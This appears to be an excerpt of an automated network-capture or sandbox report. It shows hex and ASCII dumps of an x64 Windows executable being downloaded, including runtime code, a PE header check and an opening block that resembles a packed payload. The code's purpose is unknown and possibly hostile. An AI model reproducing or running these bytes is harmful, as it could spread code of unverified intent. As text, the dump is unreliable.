                                                    2022-05-23 07:19:16 UTC9INData Raw: 75 76 6d c7 85 fc 09 00 00 75 06 24 57 c7 85 00 0a 00 00 54 b7 6c f1 c7 85 04 0a 00 00 2d a6 36 14 c7 85 08 0a 00 00 2f 4c 42 c5 c7 85 0c 0a 00 00 ad 6b e2 5e c7 85 10 0a 00 00 48 3c c8 ea c7 85 14 0a 00 00 02 b2 08 af c7 85 18 0a 00 00 5b 5d 21 99 c7 85 1c 0a 00 00 b8 3b 2b 25 c7 85 20 0a 00 00 df 98 6f e3 c7 85 24 0a 00 00 88 25 4d 7d c7 85 28 0a 00 00 fd 0f 11 79 c7 85 2c 0a 00 00 2f ed 82 4a c7 85 30 0a 00 00 cc 66 b9 a0 c7 85 34 0a 00 00 6e c3 5b 55 c7 85 38 0a 00 00 0a 5c e6 f5 c7 85 3c 0a 00 00 d5 3f b5 2c c7 85 40 0a 00 00 94 a6 2c a2 c7 85 44 0a 00 00 91 25 20 de c7 85 48 0a 00 00 26 a6 7c 18 c7 85 4c 0a 00 00 7d f8 2a e1 c7 85 50 0a 00 00 24 68 75 4e c7 85 54 0a 00 00 c9 37 5f 0a c7 85 58 0a 00 00 3c 29 f6 e2 c7 85 5c 0a 00 00 47 15 18 b4 c7 85
                                                    Data Ascii: uvmu$WTl-6/LBk^H<[]!;+% o$%M}(y,/J0f4n[U8\<?,@,D% H&|L}*P$huNT7_X<)\G
                                                    2022-05-23 07:19:16 UTC11INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc 66 66 0f 1f 84 00 00 00 00 00 48 3b 0d 91 7d 02 00 75 11 48 c1 c1 10 66 f7 c1 ff ff 75 02 f3 c3 48 c1 c9 10 e9 81 04 00 00 cc cc cc cc cc cc cc 66 66 0f 1f 84 00 00 00 00 00 48 8b c1 49 83 f8 08 72 53 0f b6 d2 49 b9 01 01 01 01 01 01 01 01 49 0f af d1 49 83 f8 40 72 1e 48 f7 d9 83 e1 07 74 06 4c 2b c1 48 89 10 48 03 c8 4d 8b c8 49 83 e0 3f 49 c1 e9 06 75 39 4d 8b c8 49 83 e0 07 49 c1 e9 03 74 11 66 66 66 90 90 48 89 11 48 83 c1 08 49 ff c9 75 f4 4d 85 c0 74 0a 88 11 48 ff c1 49 ff c8 75 f6 c3 0f 1f 40 00 66 66 66 90 66 66 90 49 81 f9 00 1c 00 00 73 30 48 89 11 48 89 51 08 48 89 51 10 48 83 c1 40 48 89 51 d8 48 89 51 e0 49 ff c9 48 89 51 e8 48 89 51 f0 48 89 51 f8 75 d8 eb 94 66 0f 1f 44 00 00 48 0f c3 11 48 0f c3 51 08
                                                    Data Ascii: ffH;}uHfuHffHIrSIII@rHtL+HHMI?Iu9MIItfffHHIuMtHIu@fffffIs0HHQHQH@HQHQIHQHQHQufDHHQ
                                                    2022-05-23 07:19:16 UTC12INData Raw: 61 8d 02 00 48 8b 05 ba 8d 02 00 48 89 05 2b 8c 02 00 48 8b 84 24 90 00 00 00 48 89 05 2c 8d 02 00 c7 05 02 8c 02 00 09 04 00 c0 c7 05 fc 8b 02 00 01 00 00 00 48 8b 05 19 78 02 00 48 89 44 24 68 48 8b 05 15 78 02 00 48 89 44 24 70 ff 15 6a e8 01 00 89 05 6c 8c 02 00 b9 01 00 00 00 e8 6a 55 00 00 33 c9 ff 15 4a e8 01 00 48 8d 0d cb eb 01 00 ff 15 35 e8 01 00 83 3d 46 8c 02 00 00 75 0a b9 01 00 00 00 e8 42 55 00 00 ff 15 14 e8 01 00 ba 09 04 00 c0 48 8b c8 ff 15 fe e7 01 00 48 81 c4 88 00 00 00 c3 cc cc cc cc cc cc 4c 89 4c 24 20 4c 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 48 81 ec a8 00 00 00 48 8b 84 24 c8 00 00 00 48 8b 40 08 48 89 44 24 78 48 8b 84 24 c8 00 00 00 48 8b 4c 24 78 48 8b 00 48 2b c1 48 89 44 24 68 48 8b 84 24 c8 00 00 00 48 8b 40 38 48 89
                                                    Data Ascii: aHH+H$H,HxHD$hHxHD$pjljU3JH5=FuBUHHLL$ LD$HT$HL$HH$H@HD$xH$HL$xHH+HD$hH$H@8H
                                                    2022-05-23 07:19:16 UTC13INData Raw: cc cc cc cc 33 c0 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 48 e8 07 38 00 00 e8 a2 52 00 00 85 c0 75 0c e8 b9 00 00 00 33 c0 e9 9f 00 00 00 48 8d 0d db 02 00 00 ff 15 5d e3 01 00 89 05 cf 72 02 00 83 3d c8 72 02 00 ff 75 09 e8 91 00 00 00 33 c0 eb 7a c7 44 24 20 1b 01 00 00 4c 8d 0d 8e e6 01 00 41 b8 02 00 00 00 ba c8 02 00 00 b9 01 00 00 00 e8 e9 0b 00 00 48 89 44 24 30 48 83 7c 24 30 00 74 15 48 8b 54 24 30 8b 0d 81 72 02 00 ff 15 9b e2 01 00 85 c0 75 09 e8 42 00 00 00 33 c0 eb 2b 33 d2 48 8b 4c 24 30 e8 62 00 00 00 ff 15 74 e2 01 00 48 8b 4c 24 30 89 01 48 8b 44 24 30 48 c7 40 08 ff ff ff ff b8 01 00 00 00 48 83 c4 48 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 28 83 3d 25 72 02 00 ff 74 16 8b 0d 1d 72 02 00 ff 15 a7 e2 01 00 c7 05
                                                    Data Ascii: 3HH8Ru3H]r=ru3zD$ LAHD$0H|$0tHT$0ruB3+3HL$0btHL$0HD$0H@HHH(=%rtr
                                                    2022-05-23 07:19:16 UTC15INData Raw: d7 dd 01 00 48 8b 4c 24 30 e8 ad fd ff ff 48 83 c4 28 c3 cc cc cc cc cc cc cc cc 44 89 4c 24 20 4c 89 44 24 18 89 54 24 10 48 89 4c 24 08 48 83 ec 48 8b 44 24 68 89 44 24 20 4c 8b 4c 24 60 44 8b 44 24 58 8b 15 c9 8a 02 00 48 8b 4c 24 50 e8 17 00 00 00 48 89 44 24 30 48 8b 44 24 30 48 83 c4 48 c3 cc cc cc cc cc cc cc cc 4c 89 4c 24 20 44 89 44 24 18 89 54 24 10 48 89 4c 24 08 48 83 ec 48 c7 44 24 30 00 00 00 00 48 8d 44 24 30 48 89 44 24 28 8b 44 24 70 89 44 24 20 4c 8b 4c 24 68 44 8b 44 24 60 8b 54 24 58 48 8b 4c 24 50 e8 37 00 00 00 48 89 44 24 38 48 83 7c 24 38 00 75 1c 83 7c 24 30 00 74 15 e8 ee 67 00 00 48 85 c0 74 0b e8 e4 67 00 00 8b 4c 24 30 89 08 48 8b 44 24 38 48 83 c4 48 c3 cc cc cc cc 4c 89 4c 24 20 44 89 44 24 18 89 54 24 10 48 89 4c 24 08 48
                                                    Data Ascii: HL$0H(DL$ LD$T$HL$HHD$hD$ LL$`DD$XHL$PHD$0HD$0HHLL$ DD$T$HL$HHD$0HD$0HD$(D$pD$ LL$hDD$`T$XHL$P7HD$8H|$8u|$0tgHtgL$0HD$8HHLL$ DD$T$HL$H
                                                    2022-05-23 07:19:16 UTC16INData Raw: 02 00 48 8b 44 24 50 48 8b 0d a4 81 02 00 48 89 08 48 8b 44 24 50 48 c7 40 08 00 00 00 00 48 8b 44 24 50 48 8b 8c 24 90 00 00 00 48 89 48 10 48 8b 44 24 50 8b 8c 24 98 00 00 00 89 48 18 48 8b 44 24 50 48 8b 8c 24 80 00 00 00 48 89 48 20 48 8b 44 24 50 8b 8c 24 88 00 00 00 89 48 1c 48 8b 44 24 50 8b 4c 24 58 89 48 28 48 8b 44 24 50 48 89 05 3c 81 02 00 0f b6 05 01 68 02 00 48 8b 4c 24 50 48 83 c1 2c 41 b8 04 00 00 00 8b d0 e8 4f ea ff ff 0f b6 05 e4 67 02 00 48 8b 4c 24 50 48 8b 94 24 80 00 00 00 48 8d 4c 11 30 41 b8 04 00 00 00 8b d0 e8 29 ea ff ff 0f b6 05 c1 67 02 00 48 8b 4c 24 50 48 83 c1 30 4c 8b 84 24 80 00 00 00 8b d0 e8 0a ea ff ff 48 8b 44 24 50 48 83 c0 30 48 89 44 24 48 b9 04 00 00 00 e8 a2 4a 00 00 48 8b 44 24 48 48 83 c4 78 c3 cc cc cc cc cc
                                                    Data Ascii: HD$PHHHD$PH@HD$PH$HHHD$P$HHD$PH$HH HD$P$HHD$PL$XH(HD$PH<hHL$PH,AOgHL$PH$HL0A)gHL$PH0L$HD$PH0HD$HJHD$HHx
                                                    2022-05-23 07:19:16 UTC17INData Raw: 00 25 ff ff 00 00 83 f8 02 74 7f 48 83 bc 24 a8 00 00 00 00 74 40 8b 84 24 b0 00 00 00 89 44 24 30 48 8b 84 24 a8 00 00 00 48 89 44 24 28 48 8d 05 e4 da 01 00 48 89 44 24 20 45 33 c9 45 33 c0 33 d2 b9 01 00 00 00 e8 8d 5f 00 00 83 f8 01 75 03 cc 33 c0 eb 32 48 8d 05 14 d7 01 00 48 89 44 24 28 48 8d 05 68 d7 01 00 48 89 44 24 20 45 33 c9 45 33 c0 33 d2 b9 01 00 00 00 e8 59 5f 00 00 83 f8 01 75 03 cc 33 c0 eb 6e 48 8b 84 24 90 00 00 00 48 83 e0 f8 48 83 e8 08 41 b8 08 00 00 00 0f b6 15 7f 62 02 00 48 8b c8 e8 4a 0e 00 00 85 c0 74 45 48 8b 84 24 90 00 00 00 48 89 44 24 28 48 8d 05 02 da 01 00 48 89 44 24 20 45 33 c9 45 33 c0 33 d2 b9 01 00 00 00 e8 fb 5e 00 00 83 f8 01 75 03 cc 33 c0 e8 1e 5d 00 00 c7 00 16 00 00 00 33 c0 e9 07 05 00 00 48 8b 8c 24 90 00 00
                                                    Data Ascii: %tH$t@$D$0H$HD$(HHD$ E3E33_u32HHD$(HhHD$ E3E33Y_u3nH$HHAbHJtEH$HD$(HHD$ E3E33^u3]3H$
                                                    2022-05-23 07:19:16 UTC19INData Raw: 09 48 89 08 eb 4b 48 8b 44 24 50 48 39 05 ee 76 02 00 74 2e 48 8d 05 5d d3 01 00 48 89 44 24 20 45 33 c9 41 b8 a7 03 00 00 48 8d 15 b0 d2 01 00 b9 02 00 00 00 e8 f6 60 00 00 83 f8 01 75 03 cc 33 c0 48 8b 44 24 58 48 8b 00 48 89 05 af 76 02 00 48 83 3d a7 76 02 00 00 74 12 48 8b 05 9e 76 02 00 48 8b 4c 24 58 48 89 48 08 eb 0c 48 8b 44 24 58 48 89 05 6f 76 02 00 48 8b 44 24 58 48 8b 0d 7b 76 02 00 48 89 08 48 8b 44 24 58 48 c7 40 08 00 00 00 00 48 8b 44 24 58 48 89 05 5f 76 02 00 48 8b 44 24 60 48 81 c4 88 00 00 00 c3 cc cc 89 54 24 10 48 89 4c 24 08 48 83 ec 28 b9 04 00 00 00 e8 b9 3f 00 00 90 8b 54 24 38 48 8b 4c 24 30 e8 1a 00 00 00 90 b9 04 00 00 00 e8 ff 3f 00 00 48 83 c4 28 c3 cc cc cc cc cc cc cc cc cc cc 89 54 24 10 48 89 4c 24 08 48 83 ec 68 83 3d
                                                    Data Ascii: HKHD$PH9vt.H]HD$ E3AH`u3HD$XHHvH=vtHvHL$XHHHD$XHovHD$XH{vHHD$XH@HD$XH_vHD$`HT$HL$H(?T$8HL$0?H(T$HL$Hh=
                                                    2022-05-23 07:19:16 UTC20INData Raw: ba dc fe 75 0b 48 8b 44 24 50 83 78 28 00 74 2e 48 8d 05 10 d2 01 00 48 89 44 24 20 45 33 c9 41 b8 69 05 00 00 48 8d 15 5b cd 01 00 b9 02 00 00 00 e8 a1 5b 00 00 83 f8 01 75 03 cc 33 c0 48 8b 44 24 50 48 8b 40 20 48 83 c0 34 0f b6 0d 23 58 02 00 4c 8b c0 8b d1 48 8b 4c 24 50 e8 76 da ff ff 48 8b 4c 24 50 e8 dc 67 00 00 e9 ba 01 00 00 48 8b 44 24 50 83 78 1c 02 75 0f 83 7c 24 78 01 75 08 c7 44 24 78 02 00 00 00 48 8b 44 24 50 8b 4c 24 78 39 48 1c 74 2e 48 8d 05 48 d1 01 00 48 89 44 24 20 45 33 c9 41 b8 77 05 00 00 48 8d 15 d3 cc 01 00 b9 02 00 00 00 e8 19 5b 00 00 83 f8 01 75 03 cc 33 c0 48 8b 44 24 50 48 8b 40 20 48 8b 0d e1 70 02 00 48 2b c8 48 8b c1 48 89 05 d4 70 02 00 8b 05 76 57 02 00 83 e0 02 85 c0 0f 85 0a 01 00 00 48 8b 44 24 50 48 83 38 00 74 17
                                                    Data Ascii: uHD$Px(t.HHD$ E3AiH[[u3HD$PH@ H4#XLHL$PvHL$PgHD$Pxu|$xuD$xHD$PL$x9Ht.HHHD$ E3AwH[u3HD$PH@ HpH+HHpvWHD$PH8t
                                                    2022-05-23 07:19:16 UTC21INData Raw: 33 c9 45 33 c0 33 d2 33 c9 e8 c0 4f 00 00 83 f8 01 75 03 cc 33 c0 e9 91 00 00 00 48 8d 05 8c d2 01 00 48 89 44 24 28 48 8d 05 98 c7 01 00 48 89 44 24 20 45 33 c9 45 33 c0 33 d2 33 c9 e8 8c 4f 00 00 83 f8 01 75 03 cc 33 c0 eb 60 48 8d 05 33 d2 01 00 48 89 44 24 28 48 8d 05 67 c7 01 00 48 89 44 24 20 45 33 c9 45 33 c0 33 d2 33 c9 e8 5b 4f 00 00 83 f8 01 75 03 cc 33 c0 eb 2f 48 8d 05 d2 d1 01 00 48 89 44 24 28 48 8d 05 36 c7 01 00 48 89 44 24 20 45 33 c9 45 33 c0 33 d2 33 c9 e8 2a 4f 00 00 83 f8 01 75 03 cc 33 c0 c7 44 24 5c 00 00 00 00 e9 0c 04 00 00 c7 44 24 5c 01 00 00 00 48 8b 05 86 6b 02 00 48 89 44 24 50 eb 0d 48 8b 44 24 50 48 8b 00 48 89 44 24 50 48 83 7c 24 50 00 0f 84 dd 03 00 00 c7 44 24 60 01 00 00 00 48 8b 44 24 50 8b 40 1c 25 ff ff 00 00 83 f8
                                                    Data Ascii: 3E333Ou3HHD$(HHD$ E3E333Ou3`H3HD$(HgHD$ E3E333[Ou3/HHD$(H6HD$ E3E333*Ou3D$\D$\HkHD$PHD$PHHD$PH|$PD$`HD$P@%
                                                    2022-05-23 07:19:16 UTC23INData Raw: 34 00 75 3c e8 9c 48 00 00 c7 00 16 00 00 00 48 c7 44 24 20 00 00 00 00 41 b9 79 07 00 00 4c 8d 05 b0 c2 01 00 48 8d 15 a1 cd 01 00 48 8d 0d c2 cd 01 00 e8 ad 5a 00 00 8b 05 6f 4d 02 00 eb 67 b9 04 00 00 00 e8 2b 30 00 00 90 8b 05 5c 4d 02 00 89 44 24 30 83 7c 24 50 ff 74 3d 8b 44 24 50 83 e0 04 85 c0 74 0c c7 05 a0 66 02 00 01 00 00 00 eb 12 8b 44 24 50 c1 f8 10 25 ff ff 00 00 89 05 8c 66 02 00 c7 05 56 66 02 00 00 00 00 00 8b 44 24 50 89 05 14 4d 0d 0a
                                                    Data Ascii: 4u<HHD$ AyLHHZoMg+0\MD$0|$Pt=D$PtfD$P%fVfD$PM
                                                    2022-05-23 07:19:16 UTC23INData Raw: 37 66 66 32 0d 0a 02 00 b9 04 00 00 00 e8 32 30 00 00 8b 44 24 30 48 83 c4 48 c3 cc cc cc cc cc cc cc cc cc 44 89 44 24 18 89 54 24 10 48 89 4c 24 08 48 83 ec 18 48 83 7c 24 20 00 74 09 c7 04 24 01 00 00 00 eb 07 c7 04 24 00 00 00 00 8b 04 24 48 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 28 48 83 7c 24 30 00 75 04 33 c0 eb 3c 48 8b 44 24 30 48 83 e8 30 45 33 c0 ba 30 00 00 00 48 8b c8 e8 92 ff ff ff 85 c0 75 04 33 c0 eb 1b 48 8b 44 24 30 48 83 e8 30 4c 8b c0 33 d2 48 8b 0d 3d 67 02 00 ff 15 0f bd 01 00 48 83 c4 28 c3 cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 68 48 83 7c 24 70 00 74 0a c7 44 24 54 01 00 00 00 eb 08 c7 44 24 54 00 00 00 00 8b 44 24 54 89 44 24 50 83 7c 24 50 00 75 2e 48 8d 05 77 ce 01 00 48 89
                                                    Data Ascii: 7ff220D$0HHDD$T$HL$HH|$ t$$$HHL$H(H|$0u3<HD$0H0E30Hu3HD$0H0L3H=gH(HL$HhH|$ptD$TD$TD$TD$P|$Pu.HwH
                                                    2022-05-23 07:19:16 UTC24INData Raw: 0f cb 01 00 48 89 44 24 28 48 8d 05 73 bc 01 00 48 89 44 24 20 45 33 c9 45 33 c0 33 d2 33 c9 e8 67 44 00 00 83 f8 01 75 03 cc 33 c0 48 83 7c 24 60 00 74 0d 48 8b 44 24 60 48 8b 00 48 89 44 24 48 48 8b 05 c3 60 02 00 48 89 44 24 40 eb 0d 48 8b 44 24 40 48 8b 00 48 89 44 24 40 48 83 7c 24 40 00 0f 84 c9 02 00 00 48 8b 44 24 48 48 39 44 24 40 0f 84 b9 02 00 00 48 8b 44 24 40 8b 40 1c 25 ff ff 00 00 83 f8 03 74 30 48 8b 44 24 40 8b 40 1c 25 ff ff 00 00 85 c0 74 1f 48 8b 44 24 40 8b 40 1c 25 ff ff 00 00 83 f8 02 75 12 8b 05 10 47 02 00 83 e0 10 85 c0 75 05 e9 6d 02 00 00 48 8b 44 24 40 48 83 78 10 00 0f 84 a0 00 00 00 45 33 c0 ba 01 00 00 00 48 8b 44 24 40 48 8b 48 10 e8 e6 f9 ff ff 85 c0 74 18 ba 01 00 00 00 48 8b 44 24 40 48 8b 48 10 ff 15 76 b7 01 00 85 c0
                                                    Data Ascii: HD$(HsHD$ E3E333gDu3H|$`tHD$`HHD$HH`HD$@HD$@HHD$@H|$@HD$HH9D$@HD$@@%t0HD$@@%tHD$@@%uGumHD$@HxE3HD$@HHtHD$@HHv
                                                    2022-05-23 07:19:16 UTC25INData Raw: 00 00 48 c7 44 24 38 00 00 00 00 c7 44 24 30 1c 09 00 00 48 8d 0d 78 b7 01 00 48 89 4c 24 28 48 8d 0d d4 c5 01 00 48 89 4c 24 20 4c 8d 0d b0 c5 01 00 41 b8 22 00 00 00 ba 16 00 00 00 8b 08 e8 8e 00 00 00 e8 19 3d 00 00 8b 8c 24 c4 00 00 00 89 08 e9 0d fe ff ff 48 63 44 24 40 c6 84 04 88 00 00 00 00 48 8d 44 24 50 48 89 44 24 30 48 8d 84 24 88 00 00 00 48 89 44 24 28 48 8d 05 50 c5 01 00 48 89 44 24 20 45 33 c9 45 33 c0 33 d2 33 c9 e8 9c 3e 00 00 83 f8 01 75 03 cc 33 c0 48 8d 8c 24 a0 00 00 00 e8 87 f9 ff ff 48 8b 8c 24 e0 00 00 00 48 33 cc e8 f7 c3 ff ff 48 81 c4 f8 00 00 00 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 4c 89 4c 24 20 44 89 44 24 18 89 54 24 10 89 4c 24 08 48 83 ec 38 83 7c 24 40 00 74 14 8b 44 24 48 39 44 24 40 74 10 8b 44 24 50 39 44
                                                    Data Ascii: HD$8D$0HxHL$(HHL$ LA"=$HcD$@HD$PHD$0H$HD$(HPHD$ E3E333>u3H$H$H3HLL$ DD$T$L$H8|$@tD$H9D$@tD$P9D
                                                    2022-05-23 07:19:16 UTC27INData Raw: 00 48 c7 44 24 50 00 00 00 00 48 8b 44 24 38 48 83 e8 08 48 89 44 24 38 48 8b 44 24 20 48 39 44 24 38 72 11 e8 b0 c9 ff ff 48 8b 4c 24 38 48 39 01 75 02 eb d5 48 8b 44 24 20 48 39 44 24 38 73 05 e9 8d 00 00 00 48 8b 44 24 38 48 8b 08 ff 15 75 ad 01 00 48 89 44 24 30 e8 7b c9 ff ff 48 8b 4c 24 38 48 89 01 ff 54 24 30 48 8b 0d d8 73 02 00 ff 15 52 ad 01 00 48 89 44 24 48 48 8b 0d be 73 02 00 ff 15 40 ad 01 00 48 89 44 24 50 48 8b 44 24 48 48 39 44 24 40 75 0c 48 8b 44 24 50 48 39 44 24 28 74 28 48 8b 44 24 48 48 89 44 24 40 48 8b 44 24 40 48 89 44 24 20 48 8b 44 24 50 48 89 44 24 28 48 8b 44 24 28 48 89 44 24 38 e9 1a ff ff ff 48 8d 15 ef ae 01 00 48 8d 0d c8 ae 01 00 e8 83 01 00 00 48 8d 15 ec ae 01 00 48 8d 0d dd ae 01 00 e8 70 01 00 00 83 3d cd 55 02 00
                                                    Data Ascii: HD$PHD$8HHD$8HD$ H9D$8rHL$8H9uHD$ H9D$8sHD$8HuHD$0{HL$8HT$0HsRHD$HHs@HD$PHD$HH9D$@uHD$PH9D$(t(HD$HHD$@HD$@HD$ HD$PHD$(HD$(HD$8HHHHp=U
                                                    2022-05-23 07:19:16 UTC28INData Raw: 00 00 48 63 84 24 a0 00 00 00 48 8d 0d cf 6c 02 00 48 8b 94 24 c0 00 00 00 48 89 14 c1 8b 05 a1 6c 02 00 83 c0 20 89 05 98 6c 02 00 eb 14 48 8b 84 24 c0 00 00 00 48 83 c0 58 48 89 84 24 c0 00 00 00 48 63 84 24 a0 00 00 00 48 8d 0d 8f 6c 02 00 48 8b 04 c1 48 05 00 0b 00 00 48 39 84 24 c0 00 00 00 0f 83 87 00 00 00 48 8b 84 24 c0 00 00 00 c6 40 08 00 48 8b 84 24 c0 00 00 00 48 c7 00 ff ff ff ff 48 8b 84 24 c0 00 00 00 c6 40 09 0a 48 8b 84 24 c0 00 00 00 c7 40 0c 00 00 00 00 48 8b 84 24 c0 00 00 00 0f b6 40 38 24 80 48 8b 8c 24 c0 00 00 00 88 41 38 48 8b 84 24 c0 00 00 00 c6 40 39 0a 48 8b 84 24 c0 00 00 00 c6 40 3a 0a 48 8b 84 24 c0 00 00 00 c7 40 50 00 00 00 00 48 8b 84 24 c0 00 00 00 c6 40 4c 00 e9 3e ff ff ff e9 a1 fe ff ff c7 84 24 a8 00 00 00 00 00 00
                                                    Data Ascii: Hc$HlH$Hl lH$HXH$Hc$HlHHH9$H$@H$HH$@H$@H$@8$H$A8H$@9H$@:H$@PH$@L>$
                                                    2022-05-23 07:19:16 UTC29INData Raw: cc cc cc cc cc cc cc 48 83 ec 58 83 3d 8d 69 02 00 00 75 05 e8 4e 2c 00 00 c7 44 24 38 00 00 00 00 48 8b 05 d7 45 02 00 48 89 44 24 30 48 83 7c 24 30 00 75 0a b8 ff ff ff ff e9 cf 01 00 00 48 8b 44 24 30 0f be 00 85 c0 74 32 48 8b 44 24 30 0f be 00 83 f8 3d 74 0a 8b 44 24 38 ff c0 89 44 24 38 48 8b 4c 24 30 e8 cb 5a 00 00 48 8b 4c 24 30 48 8d 44 01 01 48 89 44 24 30 eb c2 8b 44 24 38 ff c0 48 98 c7 44 24 20 75 00 00 00 4c 8d 0d c3 b6 01 00 41 b8 02 00 00 00 ba 08 00 00 00 48 8b c8 e8 00 cb ff ff 48 89 44 24 40 48 8b 44 24 40 48 89 05 27 4b 02 00 48 83 3d 1f 4b 02 00 00 75 0a b8 ff ff ff ff e9 42 01 00 00 48 8b 05 2c 45 02 00 48 89 44 24 30 eb 15 48 63 44 24 48 48 8b 4c 24 30 48 03 c8 48 8b c1 48 89 44 24 30 48 8b 44 24 30 0f be 00 85 c0 0f 84 db 00 00 00
                                                    Data Ascii: HX=iuN,D$8HEHD$0H|$0uHD$0t2HD$0=tD$8D$8HL$0ZHL$0HDHD$0D$8HD$ uLAHHD$@HD$@H'KH=KuBH,EHD$0HcD$HHL$0HHHD$0HD$0
                                                    2022-05-23 07:19:16 UTC31INData Raw: 85 c0 74 23 83 7c 24 28 00 0f 85 02 ff ff ff 0f b6 44 24 30 83 f8 20 74 0e 0f b6 44 24 30 83 f8 09 0f 85 ea fe ff ff 0f b6 44 24 30 85 c0 75 0f 48 8b 44 24 20 48 ff c8 48 89 44 24 20 eb 11 48 83 7c 24 60 00 74 09 48 8b 44 24 60 c6 40 ff 00 c7 44 24 28 00 00 00 00 48 8b 44 24 20 0f be 00 85 c0 74 29 48 8b 44 24 20 0f be 00 83 f8 20 74 0d 48 8b 44 24 20 0f be 00 83 f8 09 75 0f 48 8b 44 24 20 48 ff c0 48 89 44 24 20 eb d7 48 8b 44 24 20 0f be 00 85 c0 75 05 e9 5b 02 00 00 48 83 7c 24 58 00 74 1b 48 8b 44 24 58 48 8b 4c 24 60 48 89 08 48 8b 44 24 58 48 83 c0 08 48 89 44 24 58 48 8b 44 24 68 8b 00 ff c0 48 8b 4c 24 68 89 01 c7 44 24 2c 01 00 00 00 c7 44 24 34 00 00 00 00 48 8b 44 24 20 0f be 00 83 f8 5c 75 19 48 8b 44 24 20 48 ff c0 48 89 44 24 20 8b 44 24 34
                                                    Data Ascii: t#|$(D$0 tD$0D$0uHD$ HHD$ H|$`tHD$`@D$(HD$ t)HD$ tHD$ uHD$ HHD$ HD$ u[H|$XtHD$XHL$`HHD$XHHD$XHD$hHL$hD$,D$4HD$ \uHD$ HHD$ D$4
                                                    2022-05-23 07:19:16 UTC32INData Raw: 75 04 33 c0 eb 35 ff 15 c9 98 01 00 8b c0 48 25 ff 00 00 00 0f b6 c0 83 f8 06 7d 1a 41 b9 04 00 00 00 4c 8d 44 24 20 33 d2 48 8b 0d 4d 42 02 00 ff 15 97 98 01 00 b8 01 00 00 00 48 83 c4 38 c3 cc cc cc cc cc 48 83 ec 28 48 8b 0d 2d 42 02 00 ff 15 8f 98 01 00 48 c7 05 1c 42 02 00 00 00 00 00 48 83 c4 28 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 48 48 c7 44 24 20 00 00 00 00 48 b8 32 a2 df 2d 99 2b 00 00 48 39 05 fa 26 02 00 74 16 48 8b 05 f1 26 02 00 48 f7 d0 48 89 05 ef 26 02 00 e9 d2 00 00 00 48 8d 4c 24 20 ff 15 4f 98 01 00 48 8b 44 24 20 48 89 44 24 28 ff 15 37 98 01 00 8b c0 48 8b 4c 24 28 48 33 c8 48 8b c1 48 89 44 24 28 ff 15 df 96 01 00 8b c0 48 8b 4c 24 28 48 33 c8 48 8b c1 48 89 44 24 28 ff 15 ff 97 01 00 8b c0 48 8b 4c 24 28 48 33
                                                    Data Ascii: u35H%}ALD$ 3HMBH8H(H-BHBH(HHHD$ H2-+H9&tH&HH&HL$ OHD$ HD$(7HL$(H3HHD$(HL$(H3HHD$(HL$(H3
                                                    2022-05-23 07:19:16 UTC33INData Raw: 08 48 89 54 24 18 44 89 44 24 10 49 c7 c1 20 05 93 19 eb 08 cc cc cc cc cc cc 66 90 c3 cc cc cc cc cc cc 66 0f 1f 84 00 00 00 00 00 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 28 48 8b 44 24 30 48 89 44 24 08 48 8b 44 24 08 0f b7 00 3d 4d 5a 00 00 74 04 33 c0 eb 4e 48 8b 44 24 08 48 63 40 3c 48 8b 4c 24 08 48 03 c8 48 8b c1 48 89 44 24 10 48 8b 44 24 10 81 38 50 45 00 00 74 04 33 c0 eb 24 48 8b 44 24 10 48 83 c0 18 48 89 04 24 48 8b 04 24 0f b7 00 3d 0b 02 00 00 74 04 33 c0 eb 05 b8 01 00 00 00 48 83 c4 28 c3 cc cc cc cc cc cc cc 48 89 54 24 10 48 89 4c 24 08 48 83 ec 28 48 8b 44 24 30 48 63 40 3c 48 8b 4c 24 30 48 03 c8 48 8b c1 48 89 04 24 c7 44 24 08 00 00 00 00 48 8b 04 24 0f b7 40 14 48 8b 0c 24 48 8d 44 01 18 48 89 44 24
                                                    Data Ascii: HT$DD$I ffHL$H(HD$0HD$HD$=MZt3NHD$Hc@<HL$HHHD$HD$8PEt3$HD$HH$H$=t3H(HT$HL$H(HD$0Hc@<HL$0HHH$D$H$@H$HDHD$
                                                    2022-05-23 07:19:16 UTC35INData Raw: c0 10 48 8d 0d 6a 1d 02 00 48 8b 0c 01 ff 15 48 8e 01 00 48 83 c4 28 c3 cc cc cc cc cc cc cc cc cc cc cc 89 4c 24 08 48 83 ec 28 48 63 44 24 30 48 6b c0 10 48 8d 0d 38 1d 02 00 48 8b 0c 01 ff 15 1e 8e 01 00 48 83 c4 28 c3 cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 18 48 8b 44 24 20 f0 ff 00 48 8b 44 24 20 48 83 b8 10 01 00 00 00 74 0f 48 8b 44 24 20 48 8b 80 10 01 00 00 f0 ff 00 48 8b 44 24 20 48 83 b8 20 01 00 00 00 74 0f 48 8b 44 24 20 48 8b 80 20 01 00 00 f0 ff 00 48 8b 44 24 20 48 83 b8 18 01 00 00 00 74 0f 48 8b 44 24 20 48 8b 80 18 01 00 00 f0 ff 00 48 8b 44 24 20 48 83 b8 30 01 00 00 00 74 0f 48 8b 44 24 20 48 8b 80 30 01 00 00 f0 ff 00 c7 04 24 00 00 00 00 eb 08 8b 04 24 ff c0 89 04 24 83 3c 24 05 0f 8f 89 00 00 00 48 63 04 24 48 6b c0 20
                                                    Data Ascii: HjHHH(L$H(HcD$0HkH8HH(HL$HHD$ HD$ HtHD$ HHD$ H tHD$ H HD$ HtHD$ HHD$ H0tHD$ H0$$$<$Hc$Hk
